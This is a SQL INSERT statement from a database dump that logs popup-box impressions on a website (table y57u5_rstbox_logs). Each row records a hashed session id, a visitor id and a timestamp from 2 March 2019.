INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(65853, '3e835cafa6e46f9d113e45c14d838955', 'df33e8ddb6d90cc4', 0, 2, 1, '2019-03-02 14:58:10'),
(65854, 'b840aff5aeba06ab9fda8998284d0a16', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-02 14:58:17'),
(65855, '6eda6657cdedbb262568959ff139920d', '0bf16c319bd2f666', 0, 2, 1, '2019-03-02 14:59:44'),
(65856, 'a8a707f8f772fc0c172772019b4dd3df', '6dde4a5bc1e9c276', 0, 2, 1, '2019-03-02 15:02:15'),
(65857, 'a8a707f8f772fc0c172772019b4dd3df', '6dde4a5bc1e9c276', 0, 2, 1, '2019-03-02 15:02:36'),
(65858, 'b5176b97adc6082cc3e45e158cc53a48', 'fd9e13a25e929cea', 0, 2, 1, '2019-03-02 15:04:34'),
(65859, 'cad45062b992cad2b1fe9a420d791fef', 'edfe950d47379572', 0, 2, 1, '2019-03-02 15:07:43'),
(65860, 'cad45062b992cad2b1fe9a420d791fef', 'edfe950d47379572', 0, 2, 1, '2019-03-02 15:07:58'),
(65861, 'f2413f154a34a8591c5f6613d726915d', 'e544297cd084dc88', 0, 2, 1, '2019-03-02 15:11:35'),
(65862, 'c9893075cbefdca9c6d0150b10bdafb5', '196ae7616c94df27', 0, 2, 1, '2019-03-02 15:12:40'),
(65863, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-03-02 15:14:30'),
(65864, '499e406c2d60e6bb2e26b6477553f5ad', 'cd931064f096776b', 0, 2, 1, '2019-03-02 15:15:37'),
(65865, '499e406c2d60e6bb2e26b6477553f5ad', 'cd931064f096776b', 0, 2, 1, '2019-03-02 15:15:59'),
(65866, 'fa74cc5b2cef687337bdbe28c5be2fc5', '49e02d957cfd6b0b', 0, 2, 1, '2019-03-02 15:17:48'),
(65867, 'fa74cc5b2cef687337bdbe28c5be2fc5', '49e02d957cfd6b0b', 0, 2, 1, '2019-03-02 15:17:57'),
(65868, 'fa74cc5b2cef687337bdbe28c5be2fc5', '49e02d957cfd6b0b', 0, 2, 1, '2019-03-02 15:19:42'),
(65869, 'e05d7c96b4a72e6a65b2aa38b7f7e896', 'e941324453bd2423', 0, 2, 1, '2019-03-02 15:20:08'),
(65870, 'fa74cc5b2cef687337bdbe28c5be2fc5', '49e02d957cfd6b0b', 0, 2, 1, '2019-03-02 15:21:02'),
(65871, 'fa74cc5b2cef687337bdbe28c5be2fc5', '49e02d957cfd6b0b', 0, 2, 1, '2019-03-02 15:24:38'),
(65872, 'fa74cc5b2cef687337bdbe28c5be2fc5', '49e02d957cfd6b0b', 0, 2, 1, '2019-03-02 15:25:19'),
(65873, '1a50302fbfaa2ed13e94f1d423f928e1', '68e262710bf07c1c', 0, 2, 1, '2019-03-02 15:25:58'),
(65874, '6461036fdc873de38e890a341290f559', '22f43a16a511f701', 0, 2, 1, '2019-03-02 15:26:44'),
(65875, '326759275fb952ddf5408e79f902b2ea', '695b3330eb3fdc74', 0, 2, 1, '2019-03-02 15:28:27'),
(65876, 'fbc0aa11399a4f6a1196d62121a9d77d', '7c5bcf99f2070582', 0, 2, 1, '2019-03-02 15:28:58'),
(65877, 'fa74cc5b2cef687337bdbe28c5be2fc5', '49e02d957cfd6b0b', 0, 2, 1, '2019-03-02 15:29:03'),
(65878, 'fa74cc5b2cef687337bdbe28c5be2fc5', '49e02d957cfd6b0b', 0, 2, 1, '2019-03-02 15:31:13'),
(65879, 'fe7ec37cdc55eb73db940b732c7e9053', '8308c587c2ca9ad0', 0, 2, 1, '2019-03-02 15:31:31'),
(65880, '3bd6b380080e360c8b9fa9c67daa9c4e', '15f5f23e9fa0a03c', 0, 2, 1, '2019-03-02 15:32:14'),
(65881, '3bd6b380080e360c8b9fa9c67daa9c4e', '15f5f23e9fa0a03c', 0, 2, 1, '2019-03-02 15:32:40'),
(65882, '57f2a9d8a29fb3c8b077aba9599716da', '15af9890c74b186c', 0, 2, 1, '2019-03-02 15:33:12'),
(65883, '57f2a9d8a29fb3c8b077aba9599716da', '15af9890c74b186c', 0, 2, 1, '2019-03-02 15:34:47'),
(65884, 'b5176b97adc6082cc3e45e158cc53a48', 'fd9e13a25e929cea', 0, 2, 1, '2019-03-02 15:35:18'),
(65885, '57f2a9d8a29fb3c8b077aba9599716da', '15af9890c74b186c', 0, 2, 1, '2019-03-02 15:36:28'),
(65886, '2b05a4053600585c22412f28af108fc0', '679c2311f97bf8cf', 0, 2, 1, '2019-03-02 15:37:17'),
(65887, '2b05a4053600585c22412f28af108fc0', '679c2311f97bf8cf', 0, 2, 1, '2019-03-02 15:37:37'),
(65888, 'ec8eb2a40d19266c8b4d5fd5c7abc1dc', 'a2b92167f54c9dc2', 0, 2, 1, '2019-03-02 15:37:42'),
(65889, 'fa74cc5b2cef687337bdbe28c5be2fc5', '49e02d957cfd6b0b', 0, 2, 1, '2019-03-02 15:37:52'),
(65890, 'ec8eb2a40d19266c8b4d5fd5c7abc1dc', 'a2b92167f54c9dc2', 0, 2, 1, '2019-03-02 15:38:14'),
(65891, 'ec8eb2a40d19266c8b4d5fd5c7abc1dc', 'a2b92167f54c9dc2', 0, 2, 1, '2019-03-02 15:38:32'),
(65892, '57f2a9d8a29fb3c8b077aba9599716da', '15af9890c74b186c', 0, 2, 1, '2019-03-02 15:38:41'),
(65893, 'ec8eb2a40d19266c8b4d5fd5c7abc1dc', 'a2b92167f54c9dc2', 0, 2, 1, '2019-03-02 15:39:00'),
(65894, 'ec8eb2a40d19266c8b4d5fd5c7abc1dc', 'a2b92167f54c9dc2', 0, 2, 1, '2019-03-02 15:39:15'),
(65895, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-03-02 15:40:29'),
(65896, '3e835cafa6e46f9d113e45c14d838955', 'df33e8ddb6d90cc4', 0, 2, 1, '2019-03-02 15:40:48'),
(65897, 'e3a0b66dc0e6376f067aec44f5105244', '152dd36b7ae63404', 0, 2, 1, '2019-03-02 15:41:47'),
(65898, 'e3a0b66dc0e6376f067aec44f5105244', '152dd36b7ae63404', 0, 2, 1, '2019-03-02 15:42:01'),
(65899, '2b05a4053600585c22412f28af108fc0', '679c2311f97bf8cf', 0, 2, 1, '2019-03-02 15:42:19'),
(65900, '3bd6b380080e360c8b9fa9c67daa9c4e', '15f5f23e9fa0a03c', 0, 2, 1, '2019-03-02 15:42:38'),
(65901, 'c9893075cbefdca9c6d0150b10bdafb5', '196ae7616c94df27', 0, 2, 1, '2019-03-02 15:43:50'),
(65902, 'f4d83ea9cd36f83190e8a9cccc460408', '23049512446aa4dd', 0, 2, 1, '2019-03-02 15:46:37'),
(65903, 'f4d83ea9cd36f83190e8a9cccc460408', '23049512446aa4dd', 0, 2, 1, '2019-03-02 15:47:05'),
(65904, '83dde4e6ba95abbcaf17bc6dc3609834', 'e3413f2163c4f64a', 0, 2, 1, '2019-03-02 15:47:06'),
(65905, '1843d8537035f4301bd85150eee09c44', '46a479c99a15203c', 0, 2, 1, '2019-03-02 15:56:47'),
(65906, '1843d8537035f4301bd85150eee09c44', '46a479c99a15203c', 0, 2, 1, '2019-03-02 15:57:34'),
(65907, '1843d8537035f4301bd85150eee09c44', '46a479c99a15203c', 0, 2, 1, '2019-03-02 15:57:59'),
(65908, 'fbc0aa11399a4f6a1196d62121a9d77d', '7c5bcf99f2070582', 0, 2, 1, '2019-03-02 15:58:35'),
(65909, 'fbc0aa11399a4f6a1196d62121a9d77d', '7c5bcf99f2070582', 0, 2, 1, '2019-03-02 15:58:53'),
(65910, 'fbc0aa11399a4f6a1196d62121a9d77d', '7c5bcf99f2070582', 0, 2, 1, '2019-03-02 15:59:08'),
(65911, 'a8b1fec463edea6823113cf58de2e083', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-02 15:59:20'),
(65912, 'f730041946d0800d27816c204db35d6c', '3de88ff4581dab27', 0, 2, 1, '2019-03-02 16:01:04'),
(65913, 'fbc0aa11399a4f6a1196d62121a9d77d', '7c5bcf99f2070582', 0, 2, 1, '2019-03-02 16:03:00'),
(65914, 'fabbd784c59e4b78ff4ed303297df693', 'a0748bc8bd0e6678', 0, 2, 1, '2019-03-02 16:03:16'),
(65915, 'fbc0aa11399a4f6a1196d62121a9d77d', '7c5bcf99f2070582', 0, 2, 1, '2019-03-02 16:03:48'),
(65916, 'f730041946d0800d27816c204db35d6c', '3de88ff4581dab27', 0, 2, 1, '2019-03-02 16:03:50'),
(65917, 'fabbd784c59e4b78ff4ed303297df693', 'a0748bc8bd0e6678', 0, 2, 1, '2019-03-02 16:03:59'),
(65918, 'fabbd784c59e4b78ff4ed303297df693', 'a0748bc8bd0e6678', 0, 2, 1, '2019-03-02 16:04:17'),
(65919, 'fabbd784c59e4b78ff4ed303297df693', 'a0748bc8bd0e6678', 0, 2, 1, '2019-03-02 16:04:24'),
(65920, 'f730041946d0800d27816c204db35d6c', '3de88ff4581dab27', 0, 2, 1, '2019-03-02 16:04:34'),
(65921, 'f47aba73ec23e3eed5bc662ffdf643d7', '471e356b82ae8f37', 0, 2, 1, '2019-03-02 16:05:00'),
(65922, '92689a0570f1ce67f8b6ff8e2fc173a1', '8fcbcbf2903f3023', 0, 2, 1, '2019-03-02 16:05:09'),
(65923, 'f47aba73ec23e3eed5bc662ffdf643d7', '471e356b82ae8f37', 0, 2, 1, '2019-03-02 16:05:21'),
(65924, 'f47aba73ec23e3eed5bc662ffdf643d7', '471e356b82ae8f37', 0, 2, 1, '2019-03-02 16:05:24'),
(65925, '3e3ea168a3b9d6f1428a2ea3008c2e60', 'df2f194cea195593', 0, 2, 1, '2019-03-02 16:05:42'),
(65926, 'e05d7c96b4a72e6a65b2aa38b7f7e896', 'e941324453bd2423', 0, 2, 1, '2019-03-02 16:05:55'),
(65927, '473b3dc8d81eac8cda7d2911b506db44', '6ad6855c7b562396', 0, 2, 1, '2019-03-02 16:06:43'),
(65928, '786322ef0e7a4c544509d6b9c353e399', '6ad6855c7b562396', 0, 2, 1, '2019-03-02 16:06:58'),
(65929, '543b96459fed07a9934c6fa27906b249', '45cfe2fe1891ae30', 0, 2, 1, '2019-03-02 16:07:23'),
(65930, 'f2413f154a34a8591c5f6613d726915d', 'e544297cd084dc88', 0, 2, 1, '2019-03-02 16:07:26'),
(65931, '786322ef0e7a4c544509d6b9c353e399', '6ad6855c7b562396', 0, 2, 1, '2019-03-02 16:07:51'),
(65932, 'fabbd784c59e4b78ff4ed303297df693', 'a0748bc8bd0e6678', 0, 2, 1, '2019-03-02 16:09:55'),
(65933, 'ca6f1267406d992c39614b0b5ec9ff8a', '679c2311f97bf8cf', 0, 2, 1, '2019-03-02 16:11:09'),
(65934, 'ca6f1267406d992c39614b0b5ec9ff8a', '679c2311f97bf8cf', 0, 2, 1, '2019-03-02 16:11:36'),
(65935, 'bc9b82937a8a2790d33baf67c7416d76', '9ead839ed439c136', 0, 2, 1, '2019-03-02 16:12:41'),
(65936, 'bc9b82937a8a2790d33baf67c7416d76', '9ead839ed439c136', 0, 2, 1, '2019-03-02 16:12:59'),
(65937, '99aae8977bc950d30099d9d4de547df2', 'c5a27e8f34f150dd', 0, 2, 1, '2019-03-02 16:13:34'),
(65938, '1a50302fbfaa2ed13e94f1d423f928e1', '68e262710bf07c1c', 0, 2, 1, '2019-03-02 16:14:04'),
(65939, '1a50302fbfaa2ed13e94f1d423f928e1', '68e262710bf07c1c', 0, 2, 1, '2019-03-02 16:14:25'),
(65940, 'a8b1fec463edea6823113cf58de2e083', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-02 16:14:49'),
(65941, '1a50302fbfaa2ed13e94f1d423f928e1', '68e262710bf07c1c', 0, 2, 1, '2019-03-02 16:15:30'),
(65942, 'b0ee1cb2cbaeabf324f84e469ba04dbf', '7ae00a1c79981cca', 0, 2, 1, '2019-03-02 16:15:40'),
(65943, 'fbc0aa11399a4f6a1196d62121a9d77d', '7c5bcf99f2070582', 0, 2, 1, '2019-03-02 16:15:45'),
(65944, '3e3ea168a3b9d6f1428a2ea3008c2e60', 'df2f194cea195593', 0, 2, 1, '2019-03-02 16:16:36'),
(65945, '1a50302fbfaa2ed13e94f1d423f928e1', '68e262710bf07c1c', 0, 2, 1, '2019-03-02 16:18:19'),
(65946, 'a8a707f8f772fc0c172772019b4dd3df', '6dde4a5bc1e9c276', 0, 2, 1, '2019-03-02 16:18:54'),
(65947, '6461036fdc873de38e890a341290f559', '22f43a16a511f701', 0, 2, 1, '2019-03-02 16:19:04'),
(65948, 'a8a707f8f772fc0c172772019b4dd3df', '6dde4a5bc1e9c276', 0, 2, 1, '2019-03-02 16:19:07'),
(65949, '63f947d951d13c845af416667cfe597c', '32d0a21ed89192dd', 0, 2, 1, '2019-03-02 16:19:12'),
(65950, '63f947d951d13c845af416667cfe597c', '32d0a21ed89192dd', 0, 2, 1, '2019-03-02 16:19:40'),
(65951, '6c7c3c652681eba792e7aefb107c6a89', '28df18a54ee99317', 0, 2, 1, '2019-03-02 16:19:48'),
(65952, 'b0ee1cb2cbaeabf324f84e469ba04dbf', '7ae00a1c79981cca', 0, 2, 1, '2019-03-02 16:19:51'),
(65953, 'a8a707f8f772fc0c172772019b4dd3df', '6dde4a5bc1e9c276', 0, 2, 1, '2019-03-02 16:19:59'),
(65954, 'a8b1fec463edea6823113cf58de2e083', '826ffa39fb70cfa6', 0, 2, 1, '2019-03-02 16:21:50'),
(65955, 'f47aba73ec23e3eed5bc662ffdf643d7', '471e356b82ae8f37', 0, 2, 1, '2019-03-02 16:22:13'),
(65956, '4ab169d3a6582f6b0f56c9942e15684b', 'e3163f1046dc4449', 0, 2, 1, '2019-03-02 16:23:43'),
(65957, '4ab169d3a6582f6b0f56c9942e15684b', 'e3163f1046dc4449', 0, 2, 1, '2019-03-02 16:23:58'),
(65958, '4d7ff222fdff55cdb7534585c8e6bc7a', '944817f133330d52', 0, 2, 1, '2019-03-02 16:24:20'),
(65959, '4d7ff222fdff55cdb7534585c8e6bc7a', '944817f133330d52', 0, 2, 1, '2019-03-02 16:24:49'),
(65960, '4d7ff222fdff55cdb7534585c8e6bc7a', '944817f133330d52', 0, 2, 1, '2019-03-02 16:25:10'),
(65961, 'a78c0f9740f7cdcfad03b84f0545b82b', '8d9d528f7fe352a2', 0, 2, 1, '2019-03-02 16:26:04'),
(65962, 'a78c0f9740f7cdcfad03b84f0545b82b', '8d9d528f7fe352a2', 0, 2, 1, '2019-03-02 16:26:14'),
(65963, 'a22d5eb5cb8a67dce9be3a5b4047b3ba', '1788a8c00c4af652', 0, 2, 1, '2019-03-02 16:26:28'),
(65964, '679cfc797d84227d07f322a4faa14c1d', '2956fd1c8bef6f2e', 0, 2, 1, '2019-03-02 16:26:35'),
(65965, '679cfc797d84227d07f322a4faa14c1d', '2956fd1c8bef6f2e', 0, 2, 1, '2019-03-02 16:26:54'),
(65966, 'af318bd098de1bd18b67f345cabdd805', '3de88ff4581dab27', 0, 2, 1, '2019-03-02 16:27:03'),
(65967, 'af318bd098de1bd18b67f345cabdd805', '3de88ff4581dab27', 0, 2, 1, '2019-03-02 16:27:06'),
(65968, 'af318bd098de1bd18b67f345cabdd805', '3de88ff4581dab27', 0, 2, 1, '2019-03-02 16:27:20'),
(65969, 'af318bd098de1bd18b67f345cabdd805', '3de88ff4581dab27', 0, 2, 1, '2019-03-02 16:27:28'),
(65970, 'ca6f1267406d992c39614b0b5ec9ff8a', '679c2311f97bf8cf', 0, 2, 1, '2019-03-02 16:28:15'),
(65971, '6461036fdc873de38e890a341290f559', '22f43a16a511f701', 0, 2, 1, '2019-03-02 16:28:20'),
(65972, 'a22d5eb5cb8a67dce9be3a5b4047b3ba', '1788a8c00c4af652', 0, 2, 1, '2019-03-02 16:28:22'),
(65973, 'ca6f1267406d992c39614b0b5ec9ff8a', '679c2311f97bf8cf', 0, 2, 1, '2019-03-02 16:28:40'),
(65974, 'a22d5eb5cb8a67dce9be3a5b4047b3ba', '1788a8c00c4af652', 0, 2, 1, '2019-03-02 16:29:06'),
(65975, '9bfae7fac5799d95575dbc8c3df8b875', '1f701c4a0ea29200', 0, 2, 1, '2019-03-02 16:29:45'),
(65976, 'a22d5eb5cb8a67dce9be3a5b4047b3ba', '1788a8c00c4af652', 0, 2, 1, '2019-03-02 16:30:03'),
(65977, 'a22d5eb5cb8a67dce9be3a5b4047b3ba', '1788a8c00c4af652', 0, 2, 1, '2019-03-02 16:31:17'),
(65978, '3d8ad3c6b7cd603f4a78ee744c252243', 'a0748bc8bd0e6678', 0, 2, 1, '2019-03-02 16:31:55'),
(65979, '3d8ad3c6b7cd603f4a78ee744c252243', 'a0748bc8bd0e6678', 0, 2, 1, '2019-03-02 16:32:16'),
(65980, 'cf31c2cc550aff50c4fe1891e1e3256b', 'df27b9a2919a8206', 0, 2, 1, '2019-03-02 16:32:16'),
(65981, 'af318bd098de1bd18b67f345cabdd805', '3de88ff4581dab27', 0, 2, 1, '2019-03-02 16:32:17'),
(65982, 'cf31c2cc550aff50c4fe1891e1e3256b', 'df27b9a2919a8206', 0, 2, 1, '2019-03-02 16:32:32'),
(65983, '7842d920c9cab37af7d266049d93b583', '9a903552e28cf43c', 0, 2, 1, '2019-03-02 16:32:39'),
(65984, '7842d920c9cab37af7d266049d93b583', '9a903552e28cf43c', 0, 2, 1, '2019-03-02 16:32:59'),
(65985, 'cf31c2cc550aff50c4fe1891e1e3256b', 'df27b9a2919a8206', 0, 2, 1, '2019-03-02 16:33:01'),
(65986, 'cf31c2cc550aff50c4fe1891e1e3256b', 'df27b9a2919a8206', 0, 2, 1, '2019-03-02 16:33:20'),
(65987, '1a50302fbfaa2ed13e94f1d423f928e1', '68e262710bf07c1c', 0, 2, 1, '2019-03-02 16:33:25'),
(65988, '1a50302fbfaa2ed13e94f1d423f928e1', '68e262710bf07c1c', 0, 2, 1, '2019-03-02 16:33:42'),
(65989, 'cf31c2cc550aff50c4fe1891e1e3256b', 'df27b9a2919a8206', 0, 2, 1, '2019-03-02 16:34:24'),
(65990, '318316cdbf070770d6bc5d018d73e9da', '56d059bc3359c3c5', 0, 2, 1, '2019-03-02 16:34:57'),
(65991, '0f9771f9414eac111f4924cece5d5f6b', 'd04e7300519a9043', 0, 2, 1, '2019-03-02 16:35:11'),
(65992, '0f9771f9414eac111f4924cece5d5f6b', 'd04e7300519a9043', 0, 2, 1, '2019-03-02 16:35:20'),
(65993, 'ca6f1267406d992c39614b0b5ec9ff8a', '679c2311f97bf8cf', 0, 2, 1, '2019-03-02 16:35:43'),
(65994, 'af318bd098de1bd18b67f345cabdd805', '3de88ff4581dab27', 0, 2, 1, '2019-03-02 16:35:59'),
(65995, 'da59ad8956f0d153916ac85f403fa8f8', '7c50276897663292', 0, 2, 1, '2019-03-02 16:36:47'),
(65996, '0f9771f9414eac111f4924cece5d5f6b', 'd04e7300519a9043', 0, 2, 1, '2019-03-02 16:37:36'),
(65997, 'cf31c2cc550aff50c4fe1891e1e3256b', 'df27b9a2919a8206', 0, 2, 1, '2019-03-02 16:39:24'),
(65998, '4ab169d3a6582f6b0f56c9942e15684b', 'e3163f1046dc4449', 0, 2, 1, '2019-03-02 16:40:41'),
(65999, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-03-02 16:40:59'),
(66000, '5c5c83eaf602eee3acc85120a93f18ed', '15af9890c74b186c', 0, 2, 1, '2019-03-02 16:41:09'),
(66001, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-03-02 16:41:17'),
(66002, '5c5c83eaf602eee3acc85120a93f18ed', '15af9890c74b186c', 0, 2, 1, '2019-03-02 16:41:28'),
(66003, 'a41694b0cd2976d4eb4c7aa57d85f59e', '3093316bf8c65b3e', 0, 2, 1, '2019-03-02 16:41:31'),
(66004, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-03-02 16:41:44'),
(66005, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-03-02 16:42:31'),
(66006, 'cf31c2cc550aff50c4fe1891e1e3256b', 'df27b9a2919a8206', 0, 2, 1, '2019-03-02 16:42:37'),
(66007, 'a41694b0cd2976d4eb4c7aa57d85f59e', '3093316bf8c65b3e', 0, 2, 1, '2019-03-02 16:42:37'),
(66008, '9c7bba3ccd4a3d352d29a81b2cc46770', '3077ce86b5231122', 0, 2, 1, '2019-03-02 16:42:50'),
(66009, 'f2acbe840f773b79d551cb8f53a3897d', '49e02d957cfd6b0b', 0, 2, 1, '2019-03-02 16:42:54'),
(66010, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-03-02 16:42:55'),
(66011, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-03-02 16:43:05'),
(66012, 'cf31c2cc550aff50c4fe1891e1e3256b', 'df27b9a2919a8206', 0, 2, 1, '2019-03-02 16:43:09'),
(66013, 'f2acbe840f773b79d551cb8f53a3897d', '49e02d957cfd6b0b', 0, 2, 1, '2019-03-02 16:43:12'),
(66014, 'b840aff5aeba06ab9fda8998284d0a16', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-02 16:43:28'),
(66015, '08005988cb25cf27fafc708dde203f3b', '15f5f23e9fa0a03c', 0, 2, 1, '2019-03-02 16:43:30'),
(66016, 'cf31c2cc550aff50c4fe1891e1e3256b', 'df27b9a2919a8206', 0, 2, 1, '2019-03-02 16:43:38'),
(66017, 'cf31c2cc550aff50c4fe1891e1e3256b', 'df27b9a2919a8206', 0, 2, 1, '2019-03-02 16:43:52'),
(66018, '216c53447ec324203fc775a2d8503c4a', '6a22e364b2dd455c', 0, 2, 1, '2019-03-02 16:43:53'),
(66019, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-03-02 16:43:58'),
(66020, '08005988cb25cf27fafc708dde203f3b', '15f5f23e9fa0a03c', 0, 2, 1, '2019-03-02 16:44:03'),
(66021, '08005988cb25cf27fafc708dde203f3b', '15f5f23e9fa0a03c', 0, 2, 1, '2019-03-02 16:44:28'),
(66022, 'cf31c2cc550aff50c4fe1891e1e3256b', 'df27b9a2919a8206', 0, 2, 1, '2019-03-02 16:44:35'),
(66023, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-03-02 16:44:41'),
(66024, '39b0e7efbb2f8778ca229795f2967ee1', 'bfb2b610635011c2', 0, 2, 1, '2019-03-02 16:44:53'),
(66025, '39b0e7efbb2f8778ca229795f2967ee1', 'bfb2b610635011c2', 0, 2, 1, '2019-03-02 16:45:02'),
(66026, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-03-02 16:45:12'),
(66027, 'f57f032acb4771fb3f8b50ff35170585', '9ead839ed439c136', 0, 2, 1, '2019-03-02 16:45:32'),
(66028, '5c5c83eaf602eee3acc85120a93f18ed', '15af9890c74b186c', 0, 2, 1, '2019-03-02 16:45:32'),
(66029, '6c7c3c652681eba792e7aefb107c6a89', '28df18a54ee99317', 0, 2, 1, '2019-03-02 16:45:35'),
(66030, 'f57f032acb4771fb3f8b50ff35170585', '9ead839ed439c136', 0, 2, 1, '2019-03-02 16:45:44'),
(66031, 'b840aff5aeba06ab9fda8998284d0a16', '93f30eaefda9d8c4', 0, 2, 1, '2019-03-02 16:45:48'),
(66032, '6461036fdc873de38e890a341290f559', '22f43a16a511f701', 0, 2, 1, '2019-03-02 16:46:03'),
(66033, 'bc8c341542c8f0860e7c12c67b27632e', 'c454d725c5518f16', 0, 2, 1, '2019-03-02 16:46:04'),
(66034, 'a8753988428182f002229d08fdf8683e', 'e2b3fae8bfe73d6e', 0, 2, 1, '2019-03-02 16:46:09'),
(66035, 'f079e7e7ea2412efca0c8c5baecdb385', 'b9974a919762d897', 0, 2, 1, '2019-03-02 16:46:20'),
(66036, 'a78c0f9740f7cdcfad03b84f0545b82b', '8d9d528f7fe352a2', 0, 2, 1, '2019-03-02 16:46:28'),
(66037, 'a8753988428182f002229d08fdf8683e', 'e2b3fae8bfe73d6e', 0, 2, 1, '2019-03-02 16:46:29'),
(66038, 'f079e7e7ea2412efca0c8c5baecdb385', 'b9974a919762d897', 0, 2, 1, '2019-03-02 16:46:37'),
(66039, '3ca12df943d122771b8d1982674f8726', 'fdf9ebf40cfff953', 0, 2, 1, '2019-03-02 16:47:23'),
(66040, '3ca12df943d122771b8d1982674f8726', 'fdf9ebf40cfff953', 0, 2, 1, '2019-03-02 16:47:27'),
(66041, '5c5c83eaf602eee3acc85120a93f18ed', '15af9890c74b186c', 0, 2, 1, '2019-03-02 16:47:45'),
(66042, 'a22d5eb5cb8a67dce9be3a5b4047b3ba', '1788a8c00c4af652', 0, 2, 1, '2019-03-02 16:47:47'),
(66043, 'cf31c2cc550aff50c4fe1891e1e3256b', 'df27b9a2919a8206', 0, 2, 1, '2019-03-02 16:47:51'),
(66044, 'a22d5eb5cb8a67dce9be3a5b4047b3ba', '1788a8c00c4af652', 0, 2, 1, '2019-03-02 16:47:57'),
(66045, 'a22d5eb5cb8a67dce9be3a5b4047b3ba', '1788a8c00c4af652', 0, 2, 1, '2019-03-02 16:48:35'),
(66046, '3ca12df943d122771b8d1982674f8726', 'fdf9ebf40cfff953', 0, 2, 1, '2019-03-02 16:48:44'),
(66047, '08005988cb25cf27fafc708dde203f3b', '15f5f23e9fa0a03c', 0, 2, 1, '2019-03-02 16:48:49'),
(66048, 'af318bd098de1bd18b67f345cabdd805', '3de88ff4581dab27', 0, 2, 1, '2019-03-02 16:49:43'),
(66049, 'c00aec73b822f3bbfdfe5efc2f339120', '85f6d12ede9c2a3e', 0, 2, 1, '2019-03-02 16:49:45'),
(66050, '3d8ad3c6b7cd603f4a78ee744c252243', 'a0748bc8bd0e6678', 0, 2, 1, '2019-03-02 16:50:19'),
(66051, '9c7bba3ccd4a3d352d29a81b2cc46770', '3077ce86b5231122', 0, 2, 1, '2019-03-02 16:50:20'),
(66052, '4ab169d3a6582f6b0f56c9942e15684b', 'e3163f1046dc4449', 0, 2, 1, '2019-03-02 16:50:44'),
(66053, 'b448205e176a687ca759befec6266385', '0c470b48f0188b6e', 0, 2, 1, '2019-03-02 16:52:33'),
(66054, '6c7c3c652681eba792e7aefb107c6a89', '28df18a54ee99317', 0, 2, 1, '2019-03-02 16:52:36'),
(66055, '6c7c3c652681eba792e7aefb107c6a89', '28df18a54ee99317', 0, 2, 1, '2019-03-02 16:52:44'),
(66056, 'b448205e176a687ca759befec6266385', '0c470b48f0188b6e', 0, 2, 1, '2019-03-02 16:52:57'),
(66057, 'f47aba73ec23e3eed5bc662ffdf643d7', '471e356b82ae8f37', 0, 2, 1, '2019-03-02 16:53:06'),
(66058, 'cd96d5983c69f7fc850ab75731bff3ce', 'c9fb54098e14a2ee', 0, 2, 1, '2019-03-02 16:53:47'),
(66059, '318316cdbf070770d6bc5d018d73e9da', '56d059bc3359c3c5', 0, 2, 1, '2019-03-02 16:54:10'),
(66060, '1eb03c1c95c5f13ecf9d4a9529b8afa6', '6dde4a5bc1e9c276', 0, 2, 1, '2019-03-02 16:55:01'),
(66061, '9c7bba3ccd4a3d352d29a81b2cc46770', '3077ce86b5231122', 0, 2, 1, '2019-03-02 16:55:18'),
(66062, 'b448205e176a687ca759befec6266385', '0c470b48f0188b6e', 0, 2, 1, '2019-03-02 16:55:19'),
(66063, '1eb03c1c95c5f13ecf9d4a9529b8afa6', '6dde4a5bc1e9c276', 0, 2, 1, '2019-03-02 16:55:24'),
(66064, '55c7ec97026a2cf0c79ef95f509cb3cb', 'e6939acbfbb4538b', 0, 2, 1, '2019-03-02 16:56:19'),
(66065, '55c7ec97026a2cf0c79ef95f509cb3cb', 'e6939acbfbb4538b', 0, 2, 1, '2019-03-02 16:56:53'),
(66066, 'f2aa0a3121b0de484955ba15dd9cbb8d', '32edccf9c82daf54', 0, 2, 1, '2019-03-02 16:57:15'),
(66067, 'f2aa0a3121b0de484955ba15dd9cbb8d', '32edccf9c82daf54', 0, 2, 1, '2019-03-02 16:57:19'),
(66068, '55c7ec97026a2cf0c79ef95f509cb3cb', 'e6939acbfbb4538b', 0, 2, 1, '2019-03-02 16:57:22'),
(66069, '55c7ec97026a2cf0c79ef95f509cb3cb', 'e6939acbfbb4538b', 0, 2, 1, '2019-03-02 16:57:30'),
(66070, '5c5c83eaf602eee3acc85120a93f18ed', '15af9890c74b186c', 0, 2, 1, '2019-03-02 16:58:30'),
(66071, '8b3cfc92437129e313fef0803006e05e', '5e5a1dbcfcc938e1', 0, 2, 1, '2019-03-02 16:58:37'),
(66072, 'bd0bb285bd4a1624a28230b8d44ee850', '14d059e5da6bdba4', 0, 2, 1, '2019-03-02 16:58:46'),
(66073, 'f47aba73ec23e3eed5bc662ffdf643d7', '471e356b82ae8f37', 0, 2, 1, '2019-03-02 16:58:50'),
(66074, '3e3ea168a3b9d6f1428a2ea3008c2e60', 'df2f194cea195593', 0, 2, 1, '2019-03-02 16:59:09'),
(66075, 'bd0bb285bd4a1624a28230b8d44ee850', '14d059e5da6bdba4', 0, 2, 1, '2019-03-02 16:59:16'),
(66076, '1a50302fbfaa2ed13e94f1d423f928e1', '68e262710bf07c1c', 0, 2, 1, '2019-03-02 16:59:26'),
(66077, '63cdcf8165fa4a1b428f8c96f921776b', 'e8f7be4b1d642ed6', 0, 2, 1, '2019-03-02 17:00:47'),
(66078, 'c00aec73b822f3bbfdfe5efc2f339120', '85f6d12ede9c2a3e', 0, 2, 1, '2019-03-02 17:00:52'),
